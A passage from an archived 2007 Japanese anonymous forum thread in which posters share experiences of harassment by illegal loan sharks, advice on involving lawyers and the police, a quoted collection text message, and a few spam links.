司法書士がヤミ金業者に電話した日は、携帯と職場と身内の携帯にものすごく電話がかかってきたよ。3日間ぐらいはこの状態が続いた。

103 :名無しさん@お腹いっぱい。:2007/11/13(火) 00:47:16 ID:dLqE88L2O
そうですか。会社はまだ続けれましたか?

104 :名無しさん@お腹いっぱい。:2007/11/13(火) 01:50:27 ID:7+GxB7riO
私は闇金でPTSDになりました。いまだに着信音やバイブには拒否反応。時々野蛮な郵便屋や宅配業者にドアを叩かれるとキレます。

105 :名無しさん@お腹いっぱい。:2007/11/13(火) 09:35:15 ID:Nl7Irj3dO
職場の人には、不当請求の嫌がらせ電話ということで協力してもらった。今も同じ職場で働いていますよ!

106 :名無しさん@お腹いっぱい。:2007/11/13(火) 13:58:01 ID:HwLx97/u0

高額融資情報です。( ̄ー ̄)y-.。o○

http://pksp.jp/kougakuyuushi/lk.cgi?&o=1



107 :ミキ:2007/11/13(火) 17:13:57 ID:z3Pq6G1rO
三國FNC安藤ですが返済が未納です!回収始める!!09027807965
0120801517

↑↑↑↑↑↑
電話に出なかったら闇金からこんなショートメールが来ました

108 :名無しさん@お腹いっぱい。:2007/11/17(土) 01:47:47 ID:AW61dL0xO
>>107
家に来たりはしないから大丈夫。
向こうは警察も怖いが金主(貸付金を出してる人)に消されるのが一番怖い。
だからシカトしてれば追込みかける位なら自腹で穴埋めして次の鴨を探しにいく

109 :名無しさん@お腹いっぱい。:2007/11/17(土) 04:16:57 ID:NEpLWb/90
姉がヤミ金から借りて、義兄も両親も皆で話し合って弁護士に依頼した。
30件のうちのほとんどが、弁護士からの電話に素直に応じたらしい。
でも2件が電話してきたり、家に来たりしてる。
姉一家はこの5日間、実家に居るんだけど、今日はヤミ金が実家にやってきた。
大声で怒鳴ったりドアを蹴ったりしたので、警察呼んだんだけど、来たのは40分後だった。

弁護士もヤミ金に電話した時の相手の反応とか、どこがゴネたとか
こっちから電話しないと、ぜんぜん報告してくれない。
40万も払ったのに、そんなもんなの?

110 :名無しさん@お腹いっぱい。:2007/11/17(土) 05:19:56 ID:ZmVN3r0bO
↑最初に警察に闇金から金借りてて取り立てが来ることを伝えておくとよいよ。警察に実家の住居とか教えておくとすぐ来てくれる。
後は必ず闇金の電話番号とかのわかる情報も教えておくこと。いざ暴行されたりしたら立件が早いから。


111 :名無しさん@お腹いっぱい。:2007/11/18(日) 02:22:12 ID:yJoPwkGL0
>>110
ありがと。
警察に前もってパトロールしてくれるように伝えてたんだけどね。
実家まで来たのは、弁護士からの電話に出なかった奴だとわかった。
どこと連絡が取れてないのか報告してくれたらいいのに。
でも弁護士が電話したところは、電話も全くなければ家にも来てない。
弁護士にはちょっと不満だけど、まぁ良かったと思わなきゃいけないのかな。

112 :名無しさん@お腹いっぱい。:2007/11/29(木) 13:54:04 ID:sTz3q3PR0
法定金利の1240倍で逮捕 090金融はカタギもやる
http://news.ameba.jp/domestic/2007/11/8963.html

113 :ウルトラマン太郎:2007/11/29(木) 19:36:02 ID:VkiKCuTAO
闇金暴露マガジン
 
お暇な時に覗いて下さい
 
http://w-o-w.jp/P/mb/1266p0821/47/

114 :ぐっちょり:2007/12/01(土) 16:55:39 ID:jymepKaN0
「中央リース」東京都千代田区
追い込みガッツリきますよ。
マジで死にかけました。。。

115 :名無しさん@お腹いっぱい。:2007/12/01(土) 17:05:41 ID:6Mhq1oreO
>>114
具体的に教えて!

34 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)